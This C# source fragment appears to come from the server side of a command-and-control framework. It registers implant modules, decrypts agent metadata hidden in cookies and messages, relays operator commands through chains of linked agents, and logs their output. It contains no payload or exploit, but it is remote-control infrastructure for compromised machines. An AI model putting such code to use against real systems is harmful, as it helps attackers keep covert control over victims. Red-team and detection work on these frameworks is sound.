public void RegisterAgentModule(AgentMetadata metadata, AgentModule module)
{
var agent = ConnectedAgents.FirstOrDefault(a => a.Metadata.AgentID.Equals(metadata.AgentID, StringComparison.OrdinalIgnoreCase));
if (agent == null)
{
CreateSession(metadata);
agent = ConnectedAgents.FirstOrDefault(a => a.Metadata.AgentID.Equals(metadata.AgentID, StringComparison.OrdinalIgnoreCase));
}
if (agent.LoadModules.Any(m => m.Name.Equals(module.Name, StringComparison.OrdinalIgnoreCase)))
{
agent.LoadModules.Remove(agent.LoadModules.FirstOrDefault(m => m.Name.Equals(module.Name, StringComparison.OrdinalIgnoreCase)));
}
agent.LoadModules.Add(module);
OnAgentEvent?.Invoke(this, new AgentEvent(agent.Metadata.AgentID, AgentEventType.ModuleRegistered, module.Name));
Log.Logger.Information("AGENT {Event} {ModuleName}", AgentEventType.ModuleRegistered.ToString(), module.Name);
}
private List <AgentMessage> ExtractAgentMessage(string webRequest)
{
List <AgentMessage> message = null;
var regex = Regex.Match(webRequest, "Message=([^\\s]+)");
if (regex.Captures.Count > 0)
{
var encrypted = Convert.FromBase64String(regex.Groups[1].Value);
if (CryptoController.VerifyHMAC(encrypted))
{
message = CryptoController.Decrypt <List <AgentMessage> >(encrypted);
}
else
{
OnAgentEvent?.Invoke(this, new AgentEvent("", AgentEventType.CryptoError, "HMAC validation failed on AgentMessage"));
}
}
return(message);
}
private AgentMetadata ExtractAgentMetadata(string webRequest)
{
AgentMetadata metadata = null;
var regex = Regex.Match(webRequest, "Cookie: Metadata=([^\\s].*)");
if (regex.Captures.Count > 0)
{
var encrypted = Convert.FromBase64String(regex.Groups[1].Value);
if (CryptoController.VerifyHMAC(encrypted))
{
metadata = CryptoController.Decrypt <AgentMetadata>(encrypted);
}
else
{
OnAgentEvent?.Invoke(this, new AgentEvent("", AgentEventType.CryptoError, "HMAC validation failed on AgentMetadata"));
}
}
return(metadata);
}
public void SendAgentCommand(AgentCommandRequest request, string user)
{
var agent = ConnectedAgents.FirstOrDefault(a => a.Metadata.AgentID.Equals(request.AgentId, StringComparison.OrdinalIgnoreCase));
if (agent != null)
{
while (true)
{
if (!string.IsNullOrEmpty(agent.Metadata.ParentAgentID))
{
var parentAgent = agent.Metadata.ParentAgentID;
agent = ConnectedAgents.FirstOrDefault(a => a.Metadata.AgentID.Equals(parentAgent, StringComparison.OrdinalIgnoreCase));
if (string.IsNullOrEmpty(agent.Metadata.ParentAgentID))
{
break;
}
}
else
{
break;
}
}
agent.QueuedCommands.Enqueue(new AgentMessage
{
IdempotencyKey = Guid.NewGuid().ToString(),
Metadata = new AgentMetadata(),
Data = new C2Data {
AgentID = request.AgentId, Module = request.Module, Command = request.Command, Data = Encoding.UTF8.GetBytes(request.Data)
}
});
OnAgentEvent?.Invoke(this, new AgentEvent(request.AgentId, AgentEventType.CommandRequest, request.Command));
Log.Logger.Information("AGENT {Event} {AgentID} {Command} {Nick}", AgentEventType.CommandRequest.ToString(), request.AgentId, request.Command, user);
}
}
private void HandleAgentError(AgentMetadata metadata, C2Data c2Data)
{
var error = Encoding.UTF8.GetString(c2Data.Data);
OnAgentEvent?.Invoke(this, new AgentEvent(metadata.AgentID, AgentEventType.AgentError, error));
}
private void HandleAgentOutput(AgentMetadata metadata, C2Data c2Data)
{
var output = Encoding.UTF8.GetString(c2Data.Data);
OnAgentEvent?.Invoke(this, new AgentEvent(metadata.AgentID, AgentEventType.CommandResponse, output));
}